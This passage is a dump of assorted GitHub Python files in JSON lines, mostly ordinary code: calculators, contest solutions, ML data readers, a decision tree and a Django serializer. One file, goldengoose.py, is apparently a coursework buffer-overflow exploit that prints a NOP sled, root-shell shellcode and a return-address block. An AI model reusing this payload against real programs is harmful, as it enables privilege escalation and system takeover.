script_path.parent / '../inputs' / f'{script_path.stem}.txt'\n\n with input_path.open('r') as f:\n sequence = process_input(f)\n print(\"Part 1:\", part1(sequence))\n print(\"Part 2:\", part2(sequence))\n print(part2([(\"L\", 270)]))\n","repo_name":"FusionX9000/Advent-of-Code-2020","sub_path":"solutions/Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2779599005","text":"import streamlit as st\r\nimport math\r\n\r\n\r\nst.set_page_config(page_title='MathProdigy Calculator', page_icon='calc.png', layout=\"centered\", initial_sidebar_state=\"auto\", menu_items=None)\r\n\r\ndef bmi():\r\n def calculate_bmi(weight, height):\r\n bmi = weight / (height ** 2)\r\n return bmi\r\n\r\n st.markdown(\r\n \"
BMI Calculator
\",\r\n unsafe_allow_html=True)\r\n\r\n weight = st.number_input(\"Enter your weight (in kg)\")\r\n height = st.number_input(\"Enter your height (in meters)\")\r\n\r\n calculate_button = st.button(\"Calculate BMI\")\r\n\r\n if calculate_button:\r\n if weight > 0 and height > 0:\r\n bmi = calculate_bmi(weight, height)\r\n st.success(f\"Your BMI is: **{bmi:.2f}**\")\r\n else:\r\n st.warning(\"Please enter valid weight and height values.\")\r\n\r\n\r\ndef nCal():\r\n st.markdown(\r\n \"Normal Calculator
\",\r\n unsafe_allow_html=True)\r\n\r\n num1 = st.number_input(\"Enter the first number\")\r\n num2 = st.number_input(\"Enter the second number\")\r\n\r\n operation = st.selectbox(\"Select an operation\", [\"+\", \"-\", \"*\", \"/\", \"%\"])\r\n\r\n calculate_button = st.button(\"Calculate\")\r\n\r\n if calculate_button:\r\n if operation == \"+\":\r\n result = num1 + num2\r\n elif operation == \"-\":\r\n result = num1 - num2\r\n elif operation == \"*\":\r\n result = num1 * num2\r\n elif operation == \"/\":\r\n if num2 != 0:\r\n result = num1 / num2\r\n else:\r\n st.warning(\"Cannot divide by zero.\")\r\n result = None\r\n elif operation == \"%\":\r\n result = (num1 * num2) / 100\r\n\r\n if result is not None:\r\n st.success(f\"Result: **{result}**\")\r\n\r\n\r\ndef sCal():\r\n st.markdown(\r\n \"Scientific Calculator
\",\r\n unsafe_allow_html=True)\r\n\r\n num1 = st.number_input(\"Enter the number\")\r\n\r\n operation = st.selectbox(\"Select an operation\", [\"sqrt\", \"sin\", \"cos\", \"tan\"])\r\n\r\n calculate_button = st.button(\"Calculate\")\r\n\r\n if calculate_button:\r\n if operation == \"sqrt\":\r\n result = math.sqrt(num1)\r\n elif operation == \"sin\":\r\n result = math.sin(num1)\r\n elif operation == \"cos\":\r\n result = math.cos(num1)\r\n elif operation == \"tan\":\r\n result = math.tan(num1)\r\n\r\n formatted_result = \"{:.2f}\".format(result)\r\n st.success(f\"Result: **{formatted_result}**\")\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n st.sidebar.markdown(\"\"\"\r\n \r\n \r\n \"\"\", unsafe_allow_html=True)\r\n st.sidebar.image(\r\n \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQXQ6TjjZlNL1X6yug3xJcOzMNx2K2hByEH9g&usqp=CAU\",\r\n use_column_width=True)\r\n st.sidebar.markdown(\"MathProdigy \"\r\n \"Calculator
\", unsafe_allow_html=True)\r\n selected_sidebar = st.sidebar.radio(\"Please Select One\", [\"BMI Calculator\", \"Normal Calculator\",\"Scientific Calculator\"])\r\n\r\n if selected_sidebar == \"BMI Calculator\":\r\n bmi()\r\n elif selected_sidebar == \"Normal Calculator\":\r\n nCal()\r\n elif selected_sidebar == \"Scientific Calculator\":\r\n sCal()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"mlproject5/py10","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"28758707004","text":"\"\"\"\nID: mjmande1\nLANG: PYTHON3\nTASK: subset\n\"\"\"\n\ndef printM(m):\n for s in m:\n print(s)\n print(\"====\")\n\ndef solve( n, k):\n n = int(n) \n k = int(k) \n if (n < 0 or k < 0): return 0\n elif (matrix[n][k] != -1): return matrix[n][k]\n elif (n == 0 and k == 0): return 1\n else:\n matrix[n][k]=solve(n, k-1) + solve(n - k, k - 1)\n return matrix[n][k]\n\nfin = open('subset.in', 'r')\nfout = open('subset.out', 'w')\n\nN = int(fin.readline())\n\nif (N % 4 == 1 or N % 4 == 2):\n fout.write('0\\n')\n quit()\n\ny = N*2\nx = N\ntarget = N * (N + 1) / 2\n\nmatrix = [[-1 for i in range(N + 1)] for i in range(int(target / 2 + 1))]\n\nanser = solve(N * (N + 1) / 4, N) / 2\nfout.write(str(int(anser)) + '\\n')\nfout.close()\nfin.close() ","repo_name":"Boomer-Sooner-PC/Competitive-Programming","sub_path":"USACO/Subset Sums/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"41401572418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This software and supporting documentation are distributed by\n# Institut Federatif de Recherche 49\n# CEA/NeuroSpin, Batiment 145,\n# 91191 Gif-sur-Yvette cedex\n# France\n#\n# This software is governed by the CeCILL license version 2 under\n# French law and abiding by the rules of distribution of free software.\n# You can use, modify and/or redistribute the software under the\n# terms of the CeCILL license version 2 as circulated by CEA, CNRS\n# and INRIA at the following URL \"http://www.cecill.info\".\n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# requirements in conditions enabling the security of their systems and/or\n# data to be ensured and, more generally, to use and operate it in the\n\n\"\"\"\nThis program converts volumes contained in a folder into buckets.\nIt writes bucket files in the output folder\n\"\"\"\nimport argparse\nimport sys\nimport os\nimport csv\nimport six\n\n\ndef parse_args(argv):\n \"\"\"Parses command-line arguments\n\n Args:\n argv: a list containing command line arguments\n\n Returns:\n args\n \"\"\"\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n prog='suppress_files_from_csv.py',\n description='Suppress files listed in csv')\n parser.add_argument(\n \"-c\", \"--csv_file\", type=str, required=True,\n help='csv file containing file names to suppress.')\n\n args = parser.parse_args(argv)\n\n return args\n\n\ndef suppress(csv_file_name):\n \"\"\"Suppress files listed in csv\n \"\"\"\n print(csv_file_name)\n print(f\"Suppressing filenames contained in {csv_file_name}...\", end='')\n removed = 0\n with open(csv_file_name, 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n filename = row[0]\n print(\".\", end='')\n if os.path.isfile(filename):\n removed += 1\n print(filename)\n os.remove(filename)\n os.remove(f\"{row[0]}.minf\")\n print(\"DONE\")\n print(f\"Number of removed files = {removed}\")\n print(f\"Number of files in csv = {idx+1}\")\n\n\ndef main(argv):\n \"\"\"Reads argument line and creates cropped files and pickle file\n\n Args:\n argv: a list containing command line arguments\n \"\"\"\n\n # This code permits to catch SystemExit with exit code 0\n # such as the one raised when \"--help\" is given as argument\n try:\n # Parsing arguments\n args = parse_args(argv)\n suppress(args.csv_file)\n except SystemExit as exc:\n if exc.code != 0:\n six.reraise(*sys.exc_info())\n\n\nif __name__ == '__main__':\n # This permits to call main also from another python program\n # without having to make system calls\n main(argv=sys.argv[1:])\n","repo_name":"neurospin/deep_folding","sub_path":"deep_folding/brainvisa/utils/suppress_files_from_csv.py","file_name":"suppress_files_from_csv.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
+{"seq_id":"36047374897","text":"import sys\nimport os\n\noffset = int(sys.argv[1])\n\nNOPSLED = bytes.fromhex('90')\nNOPSLED = NOPSLED * 0x40\n\nSHELLCODE = b\"\\x48\\x31\\xff\\xb0\\x69\\x0f\\x05\\x48\\x31\\xd2\\x48\\xbb\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xeb\\x08\\x53\\x48\\x89\\xe7\\x48\\x31\\xc0\\x50\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\\x6a\\x01\\x5f\\x6a\\x3c\\x58\\x0f\\x05\"\n\n\nRETURNADDRESS = b\"00007fff\"\nRETURNADDRESS2 = b\"fffde000\"\nRETURNADDRESS = int(RETURNADDRESS, 16)\nRETURNADDRESS2 = int(RETURNADDRESS2, 16) + 0x20 * offset\nRETURNADDRESS = RETURNADDRESS.to_bytes(4, 'little')\nRETURNADDRESS2 = RETURNADDRESS2.to_bytes(4, 'little')\nRETURNADDRESSBLOCK = (RETURNADDRESS2 + RETURNADDRESS) * 0x100\n\nwith os.fdopen(sys.stdout.fileno(), \"wb\", closefd=False) as stdout:\n stdout.write(NOPSLED + SHELLCODE + RETURNADDRESSBLOCK + B'\\n')\n\nwith os.fdopen(sys.stderr.fileno(), \"w\", closefd=False) as stderr:\n stderr.write(RETURNADDRESS2.hex() + RETURNADDRESS.hex() + \"\\n\")","repo_name":"MostlyMaple/GoldenGoose","sub_path":"victim27/goldengoose.py","file_name":"goldengoose.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11332488797","text":"\"\"\"\nauthor: Arif Bashar\n\nCreate an ID3 decision tree to classify some datasets\n\"\"\"\n\nimport sys\nimport numpy as np\n\ndef sortColumn(data, column):\n return data[data[:,column].argsort()]\n\n# Return a list of probabilities for each class in the last column\ndef getClassProb(data):\n classes = np.unique(data[:, -1])\n probabilities = []\n for index in range(len(classes)):\n count = np.count_nonzero(data[:,-1] == classes[index])\n probabilities.append(count/len(data))\n return probabilities\n\n# Get information of our class labels\ndef getInfo(data):\n probabilities = getClassProb(data)\n\n info = sum(probabilities * -np.log2(probabilities))\n return info\n\n# Determining potential binary split points based on attribute value changes\n# Return dictionary containing potential split points\ndef getPotSplits(data):\n\n \"\"\"\n Using a dictionary to store the potential splits for each column\n key: column -- value: split point\n \n \"\"\"\n\n splits = {}\n _ , colSize = data.shape\n colSize -= 1\n\n for colIndex in range(colSize):\n data = sortColumn(data, colIndex)\n splits[colIndex] = [] # Use a list to store all potential splits \n values = data[:, colIndex] # Grab all values for the column\n uniqueValues = np.unique(values) # Get rid of duplicates (we only want value changes)\n\n # Enter this loop to calculate actual split points\n for index in range(len(uniqueValues)):\n if index > 0: # Skip index 0 because we can't get its previous \n current = uniqueValues[index] \n previous = uniqueValues[index-1]\n split = (current + previous) / 2\n splits[colIndex].append(split)\n\n return splits\n\n# Average the two values to make the split: those examples less than the split \n# value and those examples greater than or equal to the split value\n# Return two lists: all values above split and all values below specified split\ndef splitData(data, column, splitValue):\n values = data[:, column]\n greaterValues = data[values >= splitValue] \n lesserValues = data[values < splitValue]\n\n return greaterValues, lesserValues\n\n# Calculate the entropy so we can determine the best split\ndef getEntropy(greaterData, lesserData):\n dataCount = len(greaterData) + len(lesserData)\n greaterProb = len(greaterData) / dataCount\n lesserProb = len(lesserData) / dataCount\n entropy = (lesserProb * getInfo(lesserData) + greaterProb * getInfo(greaterData))\n\n return entropy\n\n# Determine the best split where \ndef getBestSplit(data, potentialSplits):\n # We will decide the best split based on max information gain\n maxGain = 0\n\n for column in potentialSplits:\n data = sortColumn(data, column)\n for split in potentialSplits[column]:\n greaterValues, lesserValues = splitData(data, column, split)\n entropy = getEntropy(greaterValues, lesserValues)\n gain = getInfo(data) - entropy\n\n if (maxGain < gain):\n maxGain = gain\n bestSplit = split\n bestColumn = column\n\n return bestColumn, bestSplit, maxGain\n\n# Check terminal cases\ndef isTerminal(data):\n labelColumn = data[:, -1]\n classes = np.unique(labelColumn)\n\n if len(classes) == 1:\n return True\n else:\n return False\n\n# Classify the data given what is in the last column\ndef classify(data):\n classes = np.unique(data[:, -1])\n uniqueClasses, uniqueCount = np.unique(classes, return_counts=True)\n \n index = uniqueCount.argmax()\n classification = uniqueClasses[index]\n\n return classification\n\n# Main recursive algorithm to build our decision tree\ndef buildTree(data):\n if isTerminal(data):\n return classify(data)\n \n else:\n potentialSplits = getPotSplits(data)\n bestColumn, bestSplit, _ = getBestSplit(data, potentialSplits)\n greaterValues, lesserValues = splitData(data, bestColumn, bestSplit)\n\n question = \"{} <= {}\".format(bestColumn, bestSplit)\n tree = {question: []}\n leftNode = buildTree(lesserValues)\n rightNode = buildTree(greaterValues)\n\n if rightNode == leftNode:\n tree = rightNode\n else:\n tree[question].append(leftNode)\n tree[question].append(rightNode)\n\n return tree\n\n# Use testing data and try to predict its classification one row at a time\ndef predict(testData, tree):\n question = list(tree.keys())[0]\n col, comparison, value = question.split(\" \")\n\n # Ask the question\n if comparison == \"<=\":\n if testData[int(col)] <= float(value):\n prediction = tree[question][0]\n else:\n prediction = tree[question][1]\n\n # Base case for recursion\n if not isinstance(prediction, dict):\n return prediction\n \n # Recurse through\n else:\n remainingTree = prediction\n return predict(testData, remainingTree)\n\n# Returns number of correct predictions\ndef getAccuracy(data, tree):\n accuracy = 0\n for row in range(len(data)):\n prediction = predict(data[row], tree)\n if prediction == data[row][-1]:\n accuracy += 1\n return accuracy\n \ndef main():\n trainDataName = (sys.argv[1])\n testDataName = (sys.argv[2])\n\n train = np.loadtxt(trainDataName)\n test = np.loadtxt(testDataName)\n\n if len(train.shape) < 2:\n train = np.array([train])\n if len(test.shape) < 2:\n test = np.array([test])\n\n tree = buildTree(train)\n print(tree)\n # print(getAccuracy(test, tree))\n\n \n\nmain()","repo_name":"arif-bashar/id3-decision","sub_path":"id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15176706014","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nCan you modify your previous Insertion Sort implementation to keep track of the number of \nshifts it makes while sorting? The only thing you should print is the number of shifts made \nby the algorithm to completely sort the array. A shift occurs when an element's position \nchanges in the array. Do not shift an element if it is not necessary.\n\nFunction Description:\nComplete the runningTime function below.\nrunningTime has the following parameter:\nINPUT:\n int arr[n]: an array of integers\nOUTPUT:\n int: the number of shifts it will take to sort the array\n \nLink to problem statement:\nhttps://www.hackerrank.com/challenges/runningtime/problem\n\"\"\"\n\n#!/bin/python3\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\"\"\"\nComplete the 'runningTime' function below.\nThe function is expected to return an INTEGER.\nThe function accepts INTEGER_ARRAY arr as parameter.\n\nLink to problem statement:\nhttps://www.hackerrank.com/challenges/runningtime/problem\n\"\"\"\n\ndef runningTime(arr):\n total_shifts = 0\n for i in range(1, len(arr)):\n shifts = 0\n target_num = arr[i]\n j = i -1\n while j>=0 and (arr[j] > target_num):\n arr[j+1] = arr[j]\n j -= 1\n shifts += 1\n arr[j+1] = target_num\n #print(shifts, arr)\n total_shifts += shifts\n return total_shifts\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n n = int(input().strip())\n arr = list(map(int, input().rstrip().split()))\n result = runningTime(arr)\n fptr.write(str(result) + '\\n')\n fptr.close()\n","repo_name":"akerimov/HACKER_RANK","sub_path":"RunningTime.py","file_name":"RunningTime.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42460805732","text":"import json\nimport logging\nfrom collections import Counter\nfrom itertools import combinations\nfrom typing import Dict, List, Tuple\n\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import Field, LabelField, MetadataField, TextField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer\nfrom allennlp.data.tokenizers import Token, Tokenizer\nfrom overrides import overrides\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\n@DatasetReader.register(\"scirex_coreference_train_reader\")\nclass ScirexCoreferenceTrainReader(DatasetReader):\n def __init__(\n self,\n sample_train: bool = False,\n tokenizer: Tokenizer = None,\n token_indexers: Dict[str, TokenIndexer] = None,\n lazy: bool = False,\n ) -> None:\n super().__init__(lazy)\n self._sample_train = sample_train\n self._tokenizer = tokenizer\n self._token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n\n @overrides\n def _read(self, file_path: str):\n pairs = self.generate_pairs(file_path)\n\n logger.info(\"NUMBER OF PAIRS - %d\", len(pairs))\n\n c = Counter([x[2] for x in pairs])\n min_count = min(c.values())\n prob = {k: min(1, min_count / v) for k, v in c.items()}\n\n logger.info(\"Loaded all pairs from %s\", file_path)\n for w1, w2, gold_label in pairs:\n yield self.text_to_instance(\n w1, w2, gold_label, prob[gold_label] if \"train.jsonl\" in file_path else 1.0\n )\n\n @staticmethod\n def generate_pairs(file_path):\n pairs = []\n with open(file_path, \"r\") as data_file:\n for _, line in enumerate(data_file):\n ins = json.loads(line)\n entities: List[Tuple[int, int, str]] = [tuple(x) for x in ins[\"ner\"]]\n\n clusters = {}\n for k, vlist in ins[\"coref\"].items():\n for v in vlist:\n if tuple(v) not in clusters:\n clusters[tuple(v)] = []\n clusters[tuple(v)].append(k)\n\n clusters = {k: set(v) for k, v in clusters.items()}\n\n for mention_1, mention_2 in combinations(entities, 2):\n type_1, type_2 = mention_1[2], mention_2[2]\n if type_1 != type_2:\n continue\n\n cluster_labels_1, cluster_labels_2 = (\n clusters.get((mention_1[0], mention_1[1]), set()),\n clusters.get((mention_2[0], mention_2[1]), set()),\n )\n w1, w2 = (\n \" \".join(ins[\"words\"][mention_1[0] : mention_1[1]]),\n \" \".join(ins[\"words\"][mention_2[0] : mention_2[1]]),\n )\n\n if w1.lower() == w2.lower() or len(cluster_labels_1 & cluster_labels_2) > 0:\n gold_label = 1\n elif len(cluster_labels_1) == 0 and len(cluster_labels_2) == 0:\n continue\n elif len(cluster_labels_1 & cluster_labels_2) == 0:\n gold_label = 0\n\n pairs.append((type_1 + \" \" + w1, type_2 + \" \" + w2, gold_label))\n return pairs\n\n @overrides\n def text_to_instance(\n self, # type: ignore\n premise: str,\n hypothesis: str,\n label: int,\n prob: float = None,\n ) -> Instance:\n fields: Dict[str, Field] = {}\n premise_tokens = self._tokenizer.tokenize(premise)\n hypothesis_tokens = self._tokenizer.tokenize(hypothesis)\n\n fields[\"tokens\"] = TextField(\n [Token(\"[CLS]\")] + premise_tokens + [Token(\"[SEP]\")] + hypothesis_tokens, self._token_indexers\n )\n \n fields[\"label\"] = LabelField(label, skip_indexing=True)\n\n metadata = {\n \"premise_tokens\": [x.text for x in premise_tokens],\n \"hypothesis_tokens\": [x.text for x in hypothesis_tokens],\n \"keep_prob\": prob,\n }\n fields[\"metadata\"] = MetadataField(metadata)\n\n return Instance(fields)\n","repo_name":"bernaljg/N-aryRels","sub_path":"SciREX/scirex/data/dataset_readers/coreference_train_reader.py","file_name":"coreference_train_reader.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"43039093957","text":"S=map(int,input())\ninput()\nmask=sum(2**i for i in map(int,input().split()))\nMOD=998244353\n\ndigits=0 # set(S[:i]) をbitで表したもの\nSpre=0 # int(S[:i])%MOD\ndps=[0]*1024 # 総和\ndpc=[0]*1024 # 個数\nfor i,c in enumerate(S):\n\tnew_dpc=[0]*1024\n\tnew_dps=[0]*1024\n\tfor m in range(1,1024):\n\t\tfor d in range(10):\n\t\t\tnew_dpc[m|1<\")[1:]\n seq_lst=[i.split(\"\\n\")[1] for i in fa_lst]\n val_pam(seq_lst)\n for index,ele in enumerate(fa_lst): \n num=index+1\n seq=ele.split(\"\\n\")[1]\n seq30.append(seq)\n new_ele=\">\"+ele\n new_str+=new_ele\n if num%9==0:##because the quikfold can just run the pipline maximum 9 jobs!!!\n \n input_matrix=featurization.get_input(new_str)\n output=predict(this_input=input_matrix,typ=typ_,full_length=full_length,site=site)\n all_list+=list(output)\n new_str=\"\"\n elif num==len(fa_lst) or (len(fa_lst)-num)==(len(fa_lst)%9-1):\n new_str=\"\"\n for k,i in enumerate(fa_lst[index:]): \n seq=i.split(\"\\n\")[1]\n if num!=len(fa_lst)-len(fa_lst)%9+1:#the first item of interaction\n seq30.append(seq)\n ele=\">\"+i\n num+=1\n new_str+=ele\n input_matrix=featurization.get_input(new_str)\n output=predict(input_matrix,typ=typ_,full_length=full_length,site=site)\n all_list+=list(output)\n break\n rsl=pd.DataFrame({\"30mer\":seq30,\"GNL-Scorer\":all_list})\n rsl.to_csv(\"%s_GNL_result.csv\" % typ_,sep=\",\")\n \n","repo_name":"TerminatorJ/CRISPR-TRAP-seq","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"40640800247","text":"from django.contrib.auth.models import User\nfrom django.db import transaction\nfrom api.serializers.NonSensitiveUserProfileSerializer import NonSensitiveUserProfileSerializer\nfrom ..validators.FirstAndLastNameValidator import validate_first_name, validate_last_name\nfrom utils.EmailSendingFailedError import EmailSendingFailedError\nfrom api.helper_functions import send_email_helper\nfrom rest_framework import serializers\nfrom api.helper_functions import delete_file_from_media\nimport logging\n\nlogger = logging.getLogger('django')\n\n\nclass CompleteUserProfileSerializer(NonSensitiveUserProfileSerializer):\n\n USER_FIELDS = ['first_name', 'last_name']\n USERPROFILE_FIELDS = ['city', 'state', 'country', 'timezone', 'bio', 'photo', 'slack_handle', 'linkedin', 'instagram', 'facebook', 'twitter', 'medium']\n\n first_name = serializers.CharField(validators=[validate_first_name])\n last_name = serializers.CharField(validators=[validate_last_name])\n\n class Meta:\n model = User\n fields = ['id', 'first_name', 'last_name', 'email', 'status', 'highest_role', 'date_joined', 'role_teams', 'city', 'state', 'country', 'timezone', 'bio', 'photo', 'slack_handle', 'linkedin', 'instagram', 'facebook', 'twitter', 'medium']\n\n extra_kwargs = {\n 'email': {'read_only': True},\n 'date_joined': {'read_only': True},\n }\n\n def update(self, instance, validated_data):\n user = instance\n profile = instance.userprofile\n userprofile_data = validated_data.pop('userprofile')\n email = user.email\n photo_before_update = profile.photo\n\n # set user data\n user.first_name = validated_data.get('first_name', instance.first_name)\n user.last_name = validated_data.get('last_name', instance.last_name)\n\n # set profile data\n for k, v in userprofile_data.items():\n setattr(profile, k, v)\n with transaction.atomic():\n user.save()\n profile.save()\n email_sent = send_email_helper(email, 'User Profile updated at WWCode-Silicon Valley', 'userprofile_update_email.html', {})\n if not email_sent:\n raise EmailSendingFailedError()\n photo_after_update = profile.photo\n if photo_before_update != photo_after_update and photo_before_update:\n try:\n delete_file_from_media(photo_before_update.name)\n except Exception as e:\n logger.error(f'CompleteUserProfileSerializer Update: error deleting previous image: {e}')\n return user\n","repo_name":"blulady/WWCode-SV","sub_path":"api/wwcodesvtools/api/serializers/CompleteUserProfileSerializer.py","file_name":"CompleteUserProfileSerializer.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18966738567","text":"import tensorflow as tf\nimport numpy as np\nimport glob\nimport struct\nimport data\n\n\n\n\ndef get_mask(actual_len, target_len):\n if actual_len>=target_len:\n return tf.ones([target_len],tf.float32)\n else:\n ones=tf.ones([actual_len],tf.float32)\n zeros=tf.zeros([target_len-actual_len],tf.float32)\n return tf.concat([ones,zeros],axis=0)\n\n\n\ndef raw_record_generator(data_path, img_feature_path, logger, sim_img_feature_path = None, dissim_img_feature_path = None, max_img_num=10):\n \"\"\"Generates tf.Examples from data files.\n\n Binary data format: . represents the byte size\n of . is serialized tf.Example proto. The tf.Example contains\n the tokenized article text and summary.\n\n Args:\n data_path:\n Path to tf.Example data files. Can include wildcards, e.g. if you have several training data chunk files train_001.bin, train_002.bin, etc, then pass data_path=train_* to access them all.\n single_pass:\n Boolean. If True, go through the dataset exactly once, generating examples in the order they appear, then return. Otherwise, generate random examples indefinitely.\n\n Yields:\n Deserialized tf.Example.\n \"\"\"\n\n filelist = glob.glob(data_path) # get the list of datafiles\n feature_list = glob.glob(img_feature_path)\n assert filelist, ('Error: Empty filelist at %s' % data_path) # check filelist isn't empty\n assert feature_list, ('Error: Empty feature_list at %s' % img_feature_path)\n\n filelist = sorted(filelist)\n feature_list = sorted(feature_list)\n\n sim_feature_list = glob.glob(sim_img_feature_path)\n dissim_feature_list = glob.glob(dissim_img_feature_path)\n assert sim_feature_list, ('Error: Empty feature_list at %s' % sim_img_feature_path)\n assert dissim_feature_list, ('Error: Empty feature_list at %s' % dissim_img_feature_path)\n sim_feature_list = sorted(sim_feature_list)\n dissim_feature_list = sorted(dissim_feature_list)\n # text_img_pairs = list(zip(filelist, feature_list, sim_feature_list, dissim_feature_list))\n\n \n\n for c_idx in range(len(filelist)):\n text_f = filelist[c_idx]\n img_f = feature_list[c_idx]\n reader = open(text_f, 'rb')\n chunk_img_arr = np.load(img_f)\n sim_img_f = sim_feature_list[c_idx]\n dissim_img_f = dissim_feature_list[c_idx]\n chunk_sim_img_arr = np.load(sim_img_f)\n chunk_dissim_img_arr = np.load(dissim_img_f)\n img_idx = 0\n img_num = len(list(chunk_img_arr))\n while True:\n len_bytes = reader.read(8)\n if not len_bytes: break # finished reading this file\n if img_idx == img_num: break\n img_feature = chunk_img_arr['arr_{}'.format(img_idx)]\n img_feature = img_feature[:, :max_img_num, :]\n #For similar images\n #Dataset has max 10 similar and 10 dissimilar images per article\n sim_img_feature = chunk_sim_img_arr['arr_{}'.format(img_idx)]\n sim_img_feature = sim_img_feature[:, :max_img_num, :]\n #For dissimilar images\n dissim_img_feature = chunk_dissim_img_arr['arr_{}'.format(img_idx)]\n dissim_img_feature = dissim_img_feature[:, :max_img_num, :]\n img_idx += 1\n str_len = struct.unpack('q', len_bytes)[0]\n example_str = struct.unpack('%ds' % str_len, reader.read(str_len))[0]\n e=tf.train.Example.FromString(example_str)\n try:\n article_text = e.features.feature['article'].bytes_list.value[0] # the article text was saved under the key 'article' in the data files\n abstract_text = e.features.feature['abstract'].bytes_list.value[0] # the abstract text was saved under the key 'abstract' in the data files\n url_hash = e.features.feature['url_hash'].bytes_list.value[0]\n except ValueError:\n logger.error('Failed to get article or abstract or url_hash from example')\n continue\n if len(article_text)==0: \n logger.warning('Found an example with empty article text. Skipping it.')\n elif len(abstract_text)==0:\n logger.warning('Found an example with empty abstract text. Skipping it.')\n else:\n yield (url_hash, article_text , abstract_text , img_feature, sim_img_feature, dissim_img_feature)\n\n\n\ndef example_generator(raw_dataset,params,vocab,batch_size):\n #Example generator\n for raw_record in raw_dataset:\n url_hash = raw_record[0].numpy().decode(\"utf-8\") \n article=raw_record[1].numpy().decode(\"utf-8\")\n abstract=raw_record[2].numpy().decode(\"utf-8\")\n img_feature=raw_record[3]\n if params.mode == \"train\":\n sim_img_feature = tf.squeeze(raw_record[4],axis=0) #shape (10, img_embed_dim)\n dissim_img_feature=tf.squeeze(raw_record[5], axis=0)\n img_feature = tf.squeeze(img_feature, axis=0) # shape == (img_num, img_embed_dim)\n img_num = img_feature.shape[0]\n abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)]\n start_decoding = vocab.word2id(data.START_DECODING)\n stop_decoding = vocab.word2id(data.STOP_DECODING)\n # Process the article\n article_words = article.split()\n if len(article_words) > params.max_enc_steps:\n article_words = article_words[:params.max_enc_steps]\n enc_len = len(article_words) # store the length after truncation but before padding\n enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token\n # Process the abstract\n abstract = ' '.join(abstract_sentences) # string\n abstract_words = abstract.split() # list of strings\n abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token\n\n # Get the decoder input sequence and target sequence\n dec_input, target = data.get_dec_inp_targ_seqs(abs_ids, params.max_dec_steps, start_decoding, stop_decoding)\n dec_len = len(dec_input)\n\n #Testing if any of the lengths is zero or not\n if img_num==0 or enc_len==0 or dec_len==0:\n continue\n\n if params.pointer_gen:\n # Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves\n enc_input_extend_vocab, article_oovs = data.article2ids(article_words, vocab)\n\n # Get a verison of the reference summary where in-article OOVs are represented by their temporary article OOV id\n abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, article_oovs)\n\n # Overwrite decoder target sequence so it uses the temp article OOV ids\n _, target = data.get_dec_inp_targ_seqs(abs_ids_extend_vocab, params.max_dec_steps, start_decoding, stop_decoding)\n \n\n enc_mask=get_mask(enc_len,enc_len)\n dec_mask=get_mask(dec_len,params.max_dec_steps)\n if params.mode == \"train\" and \"SIMPAD\" in params.experiment:\n img_mask=get_mask(img_num,params.max_img_num)\n else:\n img_mask=get_mask(img_num,img_num)\n \n \n \n output = {\n \"enc_len\": enc_len,\n \"enc_input\": enc_input,\n \"enc_input_extend_vocab\": enc_input_extend_vocab,\n \"enc_mask\": enc_mask,\n \"article_oovs\": article_oovs,\n \"dec_input\": dec_input,\n \"target\": target,\n \"dec_len\": dec_len,\n \"dec_mask\":dec_mask,\n \"article\": article,\n \"abstract\": abstract,\n \"abstract_sents\": abstract_sentences,\n \"img_feature\": img_feature,\n \"img_num\":img_num,\n \"img_mask\":img_mask,\n \"url_hash\" : 